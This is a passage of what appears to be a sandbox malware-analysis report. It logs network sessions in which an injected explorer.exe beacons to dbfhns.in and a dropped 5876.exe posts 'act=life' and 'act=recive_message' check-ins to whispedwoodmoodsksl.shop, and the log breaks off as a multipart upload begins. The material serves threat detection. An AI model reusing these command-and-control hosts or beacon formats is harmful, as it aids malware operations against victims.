                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            31192.168.2.853128190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:37.380507946 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://ckgltynaavllsolq.com/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 231
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:37.380525112 CEST231OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7b 0c ca e2
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu{Q rKkB2cu=BQKN8IU+JFM&bF<$w8X,p\V~1iMJv)}
                                                            May 27, 2024 15:26:38.479953051 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:38 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            32192.168.2.853129190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:42.784524918 CEST278OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://hbtkypdfbiu.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 187
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:42.784569025 CEST187OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5d 02 a5 a9
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu]\b}^2R'i4sm]Z<NS1(qK:&3,-FcH&c3
                                                            May 27, 2024 15:26:43.886503935 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:43 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            33192.168.2.853130190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:50.105824947 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://haglmiwlgvefe.net/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 263
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:50.105861902 CEST263OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7c 50 cd 9f
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu|PqR}`w&Cl?-<ok[0^1#S(27"*NFCO1.TJBi(kOfxG_x|nRJ%
                                                            May 27, 2024 15:26:51.223261118 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:51 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            34192.168.2.853131190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:26:55.402930021 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://dnvpkenpnlmca.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 347
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:26:55.402960062 CEST347OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 07 f1 8c
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vus\:i~=:c`Li9suG?n'0M<rO#joF0qB3b3@FS|t8@rsSa\x
                                                            May 27, 2024 15:26:56.507198095 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:26:56 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            35192.168.2.853132190.147.128.172804084C:\Windows\explorer.exe
                                                            TimestampBytes transferredDirectionData
                                                            May 27, 2024 15:27:00.582448006 CEST281OUTPOST /tmp/index.php HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Accept: */*
                                                            Referer: http://qvgxhyimdjdqth.org/
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                            Content-Length: 264
                                                            Host: dbfhns.in
                                                            May 27, 2024 15:27:00.582463980 CEST264OUTData Raw: 3b 6e 26 14 86 c2 6a 21 df aa c0 77 72 06 7c b9 7e 0e bc 94 18 74 92 67 0d 7d 0e 90 47 b0 c3 6d 9f 2c b6 5a 07 6d 20 6c ea ea 3f cb 3a 35 d4 f1 7b d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 20 a7 f7
                                                            Data Ascii: ;n&j!wr|~tg}Gm,Zm l?:5{J7 M@NA .[k,vu< sNl=QH)55jV)iZ)m_Y$.oHSTcT#9ZpGN KC)tZ`Zv3I}JOK2
                                                            May 27, 2024 15:27:01.657985926 CEST151INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.26.0
                                                            Date: Mon, 27 May 2024 13:27:01 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Connection: close
                                                            Data Raw: 03 00 00 00 72 e8 84
                                                            Data Ascii: r


                                                            HTTPS Proxied Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.853066188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:37 UTC271OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 8
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:37 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                            Data Ascii: act=life
                                                            2024-05-27 13:23:37 UTC812INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=uh1c1bf702cv85k4kv8gk26k20; expires=Fri, 20-Sep-2024 07:10:16 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BU89%2B%2BMwJW0JaLFzQOgXBzxXHApqYJUgG1yhm7wOCPktntKMexY%2BStzaimAgtbfU2PqX8AyJ5FWxDE17dj9z82gQ5mcqPKceckywTSLLEoSeOOYg5CFXyErHVCFwUa7tjwCeT7OXEazM%2FUI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a6520cbf5d2395-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:37 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
                                                            2024-05-27 13:23:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.853068188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:38 UTC272OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 74
                                                            Host: whispedwoodmoodsksl.shop
                                                            2024-05-27 13:23:38 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 73 77 67 35 45 47 2d 2d 26 6a 3d 38 62 61 63 36 34 34 31 36 36 63 64 64 32 32 30 34 64 30 66 61 33 30 36 31 37 32 62 30 32 35 34
                                                            Data Ascii: act=recive_message&ver=4.0&lid=swg5EG--&j=8bac644166cdd2204d0fa306172b0254
                                                            2024-05-27 13:23:38 UTC818INHTTP/1.1 200 OK
                                                            Date: Mon, 27 May 2024 13:23:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: PHPSESSID=cptrs1i2j7ltinfmq50rkjte7i; expires=Fri, 20-Sep-2024 07:10:17 GMT; Max-Age=9999999; path=/
                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                            Pragma: no-cache
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2BV72wMzgS%2FVN6t1Dh4Wz%2FKjxi%2BMgmsyJMtmZjqQyza40DPDJVKA4UxcOwK0Sh%2B3aXwYS8Z%2FOyUjbd795kO2HvrMXlU6FnMyHEi5CQca5OZ6bGQ86bKIG%2FLdEYC7012PPuHJXT6JEBhRyHI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 88a65214d8451760-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-27 13:23:38 UTC551INData Raw: 33 31 39 38 0d 0a 42 51 71 55 2b 77 59 6f 6a 54 6b 53 39 30 4c 70 4c 6b 6c 4b 43 44 65 6f 79 76 53 74 6d 36 4c 55 53 38 73 4d 46 2f 6b 34 66 72 5a 2b 4b 4f 4c 5a 50 42 79 68 47 32 47 53 59 4e 4e 61 4f 7a 39 74 47 34 71 72 6b 49 2b 68 78 4c 55 6e 75 47 6b 37 32 31 30 47 6c 44 39 52 37 39 6c 6a 52 71 38 44 4d 4a 49 6f 69 30 38 6c 4b 47 6c 63 78 37 71 59 7a 76 50 4f 73 79 4f 75 62 33 4f 59 56 42 50 54 59 47 2f 31 6b 57 68 42 34 46 46 2f 31 57 37 4c 53 7a 4e 6f 4d 68 58 6c 72 34 44 4d 31 73 4f 6e 49 4f 6c 78 4f 34 49 61 47 39 67 6e 4d 4c 61 61 59 30 72 68 58 33 61 63 4b 6f 46 47 4c 53 6c 73 58 64 69 6a 6b 73 58 7a 77 4c 41 69 70 47 5a 6e 6c 56 34 55 32 47 5a 6c 39 64 6b 71 43 75 68 44 4d 4d 31 67 32 48 34 6f 4f 58 74 41 78 37 69 51 6a 2b 61 4f 72 32 6d 75 59
                                                            Data Ascii: 3198BQqU+wYojTkS90LpLklKCDeoyvStm6LUS8sMF/k4frZ+KOLZPByhG2GSYNNaOz9tG4qrkI+hxLUnuGk7210GlD9R79ljRq8DMJIoi08lKGlcx7qYzvPOsyOub3OYVBPTYG/1kWhB4FF/1W7LSzNoMhXlr4DM1sOnIOlxO4IaG9gnMLaaY0rhX3acKoFGLSlsXdijksXzwLAipGZnlV4U2GZl9dkqCuhDMM1g2H4oOXtAx7iQj+aOr2muY
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 71 64 67 63 6f 30 61 41 35 70 2b 4b 50 47 56 4a 42 4b 76 56 58 57 61 4d 6f 70 65 4c 69 5a 34 57 63 2b 75 6d 38 7a 33 77 4c 4d 75 70 47 42 7a 6e 46 6b 55 30 47 5a 6d 2b 70 4e 6e 54 75 77 62 50 74 55 6e 6b 77 78 7a 61 46 74 57 7a 71 2b 45 7a 50 65 41 71 57 65 77 4c 6e 4b 58 47 6b 53 55 62 57 37 37 6b 47 39 4e 35 31 64 69 6e 69 2b 49 52 53 77 75 59 46 62 43 6f 70 44 42 2b 4d 65 7a 4c 72 74 67 66 70 5a 5a 46 74 49 6e 4a 72 61 65 66 41 71 33 47 31 36 57 4d 5a 31 2b 4b 44 6c 37 46 64 58 6d 6a 34 2f 2b 7a 50 5a 78 36 57 64 39 6c 46 63 52 33 6d 6c 74 2b 35 42 6c 53 2b 4a 64 65 35 51 6f 67 30 67 73 4b 47 35 59 78 61 61 57 77 66 48 46 73 69 4f 67 4c 6a 76 62 58 51 53 55 50 79 6a 47 6c 47 68 47 35 46 63 77 69 6d 36 53 44 43 77 6b 4b 67 32 4b 6f 5a 37 41 39 4d 32 38
                                                            Data Ascii: qdgco0aA5p+KPGVJBKvVXWaMopeLiZ4Wc+um8z3wLMupGBznFkU0GZm+pNnTuwbPtUnkwxzaFtWzq+EzPeAqWewLnKXGkSUbW77kG9N51dini+IRSwuYFbCopDB+MezLrtgfpZZFtInJraefAq3G16WMZ1+KDl7FdXmj4/+zPZx6Wd9lFcR3mlt+5BlS+Jde5Qog0gsKG5YxaaWwfHFsiOgLjvbXQSUPyjGlGhG5Fcwim6SDCwkKg2KoZ7A9M28
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 4f 4c 54 51 33 43 4a 56 33 31 6c 32 70 4e 2b 52 74 76 32 7a 6e 4c 53 79 64 6f 4d 68 58 42 71 4a 72 49 38 63 61 79 49 61 5a 68 66 49 6c 62 45 4e 70 31 62 2f 61 51 61 6b 58 6a 55 6e 32 53 4c 59 42 47 4a 69 78 74 56 49 72 6d 31 73 6a 68 67 4f 35 70 6e 33 35 34 6c 33 51 58 32 47 34 6f 36 64 64 39 43 75 68 58 4d 4d 31 67 6a 30 41 6a 49 6d 56 63 77 4b 4b 5a 78 76 6e 49 76 79 43 71 62 6e 6d 64 57 78 44 59 61 6d 33 31 6e 47 6c 50 37 31 64 33 6b 69 48 4c 41 6d 73 76 63 68 57 53 36 4b 62 43 39 63 75 36 61 35 78 74 65 35 56 64 43 70 52 34 4a 75 2f 5a 59 30 61 76 41 7a 43 61 49 59 5a 47 49 43 5a 6d 56 4d 71 73 6c 63 58 35 7a 37 4d 76 6f 57 64 31 69 56 30 54 31 57 5a 6a 2f 5a 52 71 54 2b 35 65 64 39 56 75 79 30 73 7a 61 44 49 56 35 34 47 73 6a 2b 61 4f 72 32 6d 75 59
                                                            Data Ascii: OLTQ3CJV31l2pN+Rtv2znLSydoMhXBqJrI8cayIaZhfIlbENp1b/aQakXjUn2SLYBGJixtVIrm1sjhgO5pn354l3QX2G4o6dd9CuhXMM1gj0AjImVcwKKZxvnIvyCqbnmdWxDYam31nGlP71d3kiHLAmsvchWS6KbC9cu6a5xte5VdCpR4Ju/ZY0avAzCaIYZGICZmVMqslcX5z7MvoWd1iV0T1WZj/ZRqT+5ed9Vuy0szaDIV54Gsj+aOr2muY
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 53 33 6d 5a 70 2b 70 4a 72 51 65 6f 62 50 74 55 6e 6b 77 78 7a 61 46 74 57 33 4c 2b 47 77 37 6e 66 2b 44 44 70 61 58 6e 62 41 6c 7a 56 64 57 4c 38 6c 32 46 46 36 6c 68 2f 6b 69 32 4e 51 43 45 68 59 6c 50 46 6f 59 54 4d 39 63 36 78 4a 36 56 67 65 4a 46 5a 45 5a 51 70 4b 50 47 42 4a 42 4b 76 64 33 65 59 44 6f 42 41 4c 47 68 31 47 39 50 6f 6b 63 4f 35 6d 50 59 6c 6f 32 4a 38 6d 31 4d 5a 33 47 78 68 38 35 68 76 54 2b 78 64 66 5a 6f 70 6d 55 59 6f 4a 6d 6c 5a 78 71 36 58 7a 4f 76 49 76 32 6e 6e 4c 6e 4b 44 47 6b 53 55 52 6d 62 37 6a 57 4e 61 72 30 51 2b 6a 47 43 4d 51 47 74 77 4b 6c 62 4c 70 35 58 4f 39 4d 61 2f 49 61 6c 6f 63 4a 52 58 45 74 4e 67 61 50 75 58 61 30 7a 6e 56 6e 79 65 4c 6f 4a 4b 4b 79 6c 67 46 59 54 6f 6b 64 65 35 6d 50 59 5a 71 6d 35 31 67 42
                                                            Data Ascii: S3mZp+pJrQeobPtUnkwxzaFtW3L+Gw7nf+DDpaXnbAlzVdWL8l2FF6lh/ki2NQCEhYlPFoYTM9c6xJ6VgeJFZEZQpKPGBJBKvd3eYDoBALGh1G9PokcO5mPYlo2J8m1MZ3Gxh85hvT+xdfZopmUYoJmlZxq6XzOvIv2nnLnKDGkSURmb7jWNar0Q+jGCMQGtwKlbLp5XO9Ma/IalocJRXEtNgaPuXa0znVnyeLoJKKylgFYTokde5mPYZqm51gB
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 65 76 71 58 64 6b 2f 39 53 54 44 62 59 49 78 55 61 33 41 71 59 38 32 34 68 73 79 37 38 61 41 71 76 32 56 34 6c 78 6f 44 6d 6e 34 6f 38 5a 55 6b 45 71 39 64 66 35 77 6a 68 45 30 69 4a 47 64 51 77 36 32 58 79 66 33 4b 76 43 6d 76 61 48 53 65 55 42 2f 56 62 57 48 78 6b 57 4e 4a 2f 52 73 2b 31 53 65 54 44 48 4e 6f 51 31 4c 59 70 6f 61 50 35 6f 36 76 61 61 35 69 4e 63 4d 61 47 4e 35 6f 62 50 47 56 59 6b 2f 70 56 6e 47 61 49 59 74 44 4c 79 4e 6a 55 38 75 6c 6b 38 4c 39 30 72 77 69 70 6d 4a 38 6c 31 64 63 6d 69 64 76 37 74 6b 38 43 74 35 57 66 70 73 6e 6e 51 77 30 5a 6e 4d 56 7a 61 54 57 6c 37 6e 42 75 69 61 71 59 58 61 59 57 78 62 47 64 57 54 2f 6b 57 46 47 35 46 56 32 68 79 61 45 52 53 67 72 59 31 4c 43 70 4a 7a 4d 2f 6f 44 34 61 61 35 32 4e 63 4d 61 50 38 4e
                                                            Data Ascii: evqXdk/9STDbYIxUa3AqY824hsy78aAqv2V4lxoDmn4o8ZUkEq9df5wjhE0iJGdQw62Xyf3KvCmvaHSeUB/VbWHxkWNJ/Rs+1SeTDHNoQ1LYpoaP5o6vaa5iNcMaGN5obPGVYk/pVnGaIYtDLyNjU8ulk8L90rwipmJ8l1dcmidv7tk8Ct5WfpsnnQw0ZnMVzaTWl7nBuiaqYXaYWxbGdWT/kWFG5FV2hyaERSgrY1LCpJzM/oD4aa52NcMaP8N
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 47 4a 46 34 46 4a 35 6b 53 69 49 54 43 38 73 62 56 44 4a 70 4a 33 49 2b 73 2b 79 49 4b 64 6e 65 74 73 55 58 4e 4e 2f 4b 4b 37 5a 52 56 48 73 56 33 33 56 50 38 56 56 61 79 39 6d 46 5a 4c 6f 6d 73 48 38 77 4c 77 76 72 57 74 7a 6b 56 38 63 33 32 52 6e 38 70 39 67 52 65 39 51 65 5a 51 6d 6a 6b 59 67 4c 6d 64 57 7a 4b 37 57 67 62 6e 48 72 6d 6e 78 4c 6c 57 41 56 78 44 54 4a 33 65 34 67 43 52 4e 34 78 73 6f 31 53 75 48 53 43 77 6f 5a 31 62 43 72 5a 4c 46 2f 4d 43 2b 4f 36 46 75 63 6f 6c 49 48 4e 31 69 5a 50 57 5a 59 45 7a 6d 58 58 4f 52 59 4d 55 4d 4c 44 41 71 44 59 71 46 6d 73 6a 51 78 36 31 70 74 69 42 73 32 31 30 51 6c 44 38 6f 39 35 4a 75 52 65 4a 59 64 70 59 72 6a 6b 59 71 4c 32 4a 59 32 4b 75 5a 77 50 33 41 75 53 2b 76 62 33 71 64 58 52 58 56 62 32 2b 32
                                                            Data Ascii: GJF4FJ5kSiITC8sbVDJpJ3I+s+yIKdnetsUXNN/KK7ZRVHsV33VP8VVay9mFZLomsH8wLwvrWtzkV8c32Rn8p9gRe9QeZQmjkYgLmdWzK7WgbnHrmnxLlWAVxDTJ3e4gCRN4xso1SuHSCwoZ1bCrZLF/MC+O6FucolIHN1iZPWZYEzmXXORYMUMLDAqDYqFmsjQx61ptiBs210QlD8o95JuReJYdpYrjkYqL2JY2KuZwP3AuS+vb3qdXRXVb2+2
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 34 62 50 74 55 6d 79 78 52 37 5a 69 70 52 32 2b 6a 4f 6e 36 75 62 34 33 72 2b 50 69 65 45 46 41 57 55 63 53 69 75 79 79 6f 4b 2f 52 73 6f 31 57 65 49 58 6a 6b 75 61 55 50 4a 37 36 6a 78 31 38 65 77 4c 4b 35 2b 4e 37 56 52 43 4e 4d 6e 4a 72 61 57 4a 42 4c 57 47 7a 6a 56 48 38 55 4d 4d 32 67 79 46 66 2b 72 6d 4d 48 2b 31 71 64 6b 68 32 6c 7a 6e 6c 30 4d 6c 6b 6c 6a 34 70 34 6b 42 4b 39 64 4d 4d 31 77 78 51 77 76 4f 53 6f 4e 6d 76 72 4e 6d 71 71 58 35 6e 75 32 49 47 7a 62 54 46 79 4d 4e 53 61 32 69 79 51 53 72 78 78 7a 68 7a 4b 4e 54 7a 30 72 4c 57 76 30 71 34 44 43 39 73 75 33 46 35 64 41 65 4a 70 5a 45 70 5a 57 66 76 75 4a 5a 30 2f 6f 5a 55 36 62 4a 35 39 4c 4a 53 35 71 46 59 54 6f 6d 59 2b 68 2b 66 5a 68 36 56 45 37 32 30 4a 63 6a 43 64 64 39 5a 64 71 54
                                                            Data Ascii: 4bPtUmyxR7ZipR2+jOn6ub43r+PieEFAWUcSiuyyoK/Rso1WeIXjkuaUPJ76jx18ewLK5+N7VRCNMnJraWJBLWGzjVH8UMM2gyFf+rmMH+1qdkh2lznl0Mlklj4p4kBK9dMM1wxQwvOSoNmvrNmqqX5nu2IGzbTFyMNSa2iyQSrxxzhzKNTz0rLWv0q4DC9su3F5dAeJpZEpZWfvuJZ0/oZU6bJ59LJS5qFYTomY+h+fZh6VE720JcjCdd9ZdqT
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 63 59 4d 55 4d 4a 47 67 79 62 49 72 67 32 73 37 30 7a 4c 4a 70 6c 69 41 31 67 78 70 45 6c 45 52 36 35 4a 64 76 53 2b 78 4e 65 35 67 73 6d 67 45 49 4a 48 46 7a 7a 62 6d 66 6a 37 65 41 73 47 6e 78 50 6a 76 62 58 67 32 55 50 7a 69 6b 77 6a 45 5a 75 41 73 69 69 6d 36 53 44 44 31 6f 4d 67 65 45 36 49 53 50 6f 59 44 78 4b 72 74 38 63 35 68 4d 48 35 4e 5a 56 74 4b 53 61 6b 33 58 55 48 36 62 49 38 73 43 61 79 63 71 44 66 50 6f 68 73 6a 34 78 37 6f 2f 75 47 6c 6c 6a 31 30 4d 78 53 74 79 2b 5a 63 6b 42 4b 39 4b 65 34 4d 6e 68 45 38 6e 4b 32 39 53 32 75 53 4d 77 50 65 41 69 57 66 70 64 6a 58 44 47 6a 2f 47 64 57 62 39 6d 47 64 63 35 46 5a 38 68 47 32 76 52 79 55 76 55 6c 37 45 70 70 57 50 74 34 43 77 61 66 45 2b 4f 39 74 65 44 5a 51 2f 4f 4b 54 43 4d 52 6d 34 43 79
                                                            Data Ascii: cYMUMJGgybIrg2s70zLJpliA1gxpElER65JdvS+xNe5gsmgEIJHFzzbmfj7eAsGnxPjvbXg2UPzikwjEZuAsiim6SDD1oMgeE6ISPoYDxKrt8c5hMH5NZVtKSak3XUH6bI8sCaycqDfPohsj4x7o/uGllj10MxSty+ZckBK9Ke4MnhE8nK29S2uSMwPeAiWfpdjXDGj/GdWb9mGdc5FZ8hG2vRyUvUl7EppWPt4CwafE+O9teDZQ/OKTCMRm4Cy
                                                            2024-05-27 13:23:38 UTC1369INData Raw: 41 77 73 34 5a 30 44 62 72 34 62 78 78 2f 65 6e 4c 72 6b 73 55 35 68 4d 48 35 51 70 4b 4f 37 5a 50 41 72 50 53 33 4f 42 4a 38 74 54 5a 54 45 71 51 34 72 77 78 59 47 35 30 76 5a 78 36 53 6c 37 6c 6c 73 66 32 6d 52 36 35 4a 39 6e 58 4f 77 63 54 71 73 48 6d 55 63 71 61 6c 68 46 77 62 79 56 7a 75 4b 43 6c 6a 6d 6b 65 32 53 63 53 69 4c 71 55 48 6e 78 69 53 5a 73 37 45 31 7a 31 57 37 4c 56 47 74 77 4b 6e 4c 59 6f 35 66 39 36 63 75 69 4b 71 68 31 56 59 74 58 43 63 56 67 65 4c 61 47 4b 6c 4f 76 54 54 44 4e 63 38 55 4d 4f 57 67 79 46 59 32 6d 6d 38 37 36 7a 72 55 37 75 32 68 32 6a 56 6c 62 36 6c 6c 63 2f 59 31 6e 52 4f 6c 51 54 71 73 58 6d 6b 73 37 61 6b 78 57 33 4b 76 57 67 62 6e 59 39 6e 48 70 57 6e 36 50 57 52 4c 53 62 43 6a 70 31 33 30 4b 2b 52 73 6f 78 6d 37
                                                            Data Ascii: Aws4Z0Dbr4bxx/enLrksU5hMH5QpKO7ZPArPS3OBJ8tTZTEqQ4rwxYG50vZx6Sl7llsf2mR65J9nXOwcTqsHmUcqalhFwbyVzuKCljmke2ScSiLqUHnxiSZs7E1z1W7LVGtwKnLYo5f96cuiKqh1VYtXCcVgeLaGKlOvTTDNc8UMOWgyFY2mm876zrU7u2h2jVlb6llc/Y1nROlQTqsXmks7akxW3KvWgbnY9nHpWn6PWRLSbCjp130K+Rsoxm7


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.853071188.114.96.34437992C:\Users\user\AppData\Local\Temp\5876.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:23:39 UTC290OUTPOST /api HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                            Content-Length: 12841
                                                            Host: whispedwoodmoodsksl.shop
